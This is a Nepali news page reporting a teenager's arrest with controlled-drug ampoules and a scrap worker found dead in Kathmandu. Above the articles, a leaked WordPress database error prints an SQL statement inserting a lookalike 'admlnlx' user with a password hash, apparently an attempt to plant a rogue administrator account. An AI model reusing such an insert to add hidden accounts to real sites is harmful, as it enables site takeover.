WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgZ1wFo/a1xgWp0hAjwwIF/h9UwjmL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:20:01', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । एक १७ वर्षका किशोर (बालक)लागुऔषध ओसारपसारमा संलग्न भएको पाएको छ । काठमाडौँ चन्द्रागिरि नगरपालिका–२ नागढुङ्गामा वीरगञ्जबाट काठमाडौँ आउँदै गरेको बा४ख ५०१६ नम्बरको बसमा जाँच गर्ने क्रममा आज एक हजार २०० एम्पुल लागुऔषधसहित उनलाई पक्राउ गरिएको प्रहरीले जनाएको छ ।
उनका साथबाट नियन्त्रित लागुऔषध ४०० एम्पुल डाइजेपाम, ४०० एम्पुल फेनारगन र ४०० एम्पुल नुर्फिन बरामद गरिएको छ । पर्साको वीरगञ्ज महानगरपालिका–२० बस्ने उनलाई कसैले लागुऔषध बोकाएर पठाएको अनुमान गरिए पनि कारण भने खुलेको छैन । घटनाका विषयमा थप अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।
खाना खाइ सुतेका व्यक्ति मृत
यता काठमाडौँ महानगरपालिका–३२ जडीबुटीस्थित जयाबाबा विश्वकर्मा कबाडी सेन्टरमा काम गर्ने भारत मोतिहारी थानाढाका स्थायी घर भएका ६५ वर्षीय रामबालक महतो आज मृत फेला परेका छन् ।
बिहान पूजापाठ गरी विभिन्न स्थानबाट कबाडी सामान सङ्कलन गरी खाना खाएर सुतेका उनी मृत भेटिएका हुन् । उक्त घटनाका विषयमा महानगरीय प्रहरी प्रभाग कोटेश्वरबाट खटिएको प्रहरीले थप अनुसन्धान गरिरहेका प्रहरी प्रधान कार्यालयले जनाएको छ । रासस